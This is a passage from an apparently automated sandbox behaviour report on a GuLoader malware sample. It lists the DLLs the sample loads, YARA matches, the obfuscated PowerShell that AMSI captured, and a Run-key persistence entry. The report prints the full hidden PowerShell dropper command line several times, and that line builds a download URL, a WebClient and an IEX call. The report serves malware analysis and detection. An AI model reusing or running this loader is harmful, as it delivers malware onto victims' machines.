                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1975994539.0000000007F8A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.1969850842.0000000006EF9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.1969850842.0000000006EF9000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected GuLoader
                Source: Yara matchFile source: 00000009.00000002.4136810424.0000000004F96000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1979915186.0000000009E76000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1977930635.00000000082A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1963840942.000000000568C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1825048064.00000272A04C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Alquifou119)$GLOBal:DaRKs = [SYStEm.teXt.eNcoDing]::asCIi.geTsTrINg($stofmnGdENs)$gLoBAl:HovekATalOGet=$dARkS.subStRInG($aHornTreTS,$sknhEDsdRoNnINgeRNE)<#Forhandleravances Supportas
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Afriggedes $Sterios $Adsignify), (Foelfod109 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Overtagelsen = [AppDomain]::CurrentDomain.GetAssemblies()$glob
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Luftlagenes)), $Tonsillar).DefineDynamicModule($Soleas170, $false).DefineType($Leverende, $Vaguely, [System.MulticastDelegate])$Deklar
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Alquifou119)$GLOBal:DaRKs = [SYStEm.teXt.eNcoDing]::asCIi.geTsTrINg($stofmnGdENs)$gLoBAl:HovekATalOGet=$dARkS.subStRInG($aHornTreTS,$sknhEDsdRoNnINgeRNE)<#Forhandleravances Supportas
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWr
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,r
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A7962 push ebx; retf 2_2_00007FFD9B8A796A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06FB3F00 push eax; ret 4_2_06FB4031
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiversifyJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiversifyJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
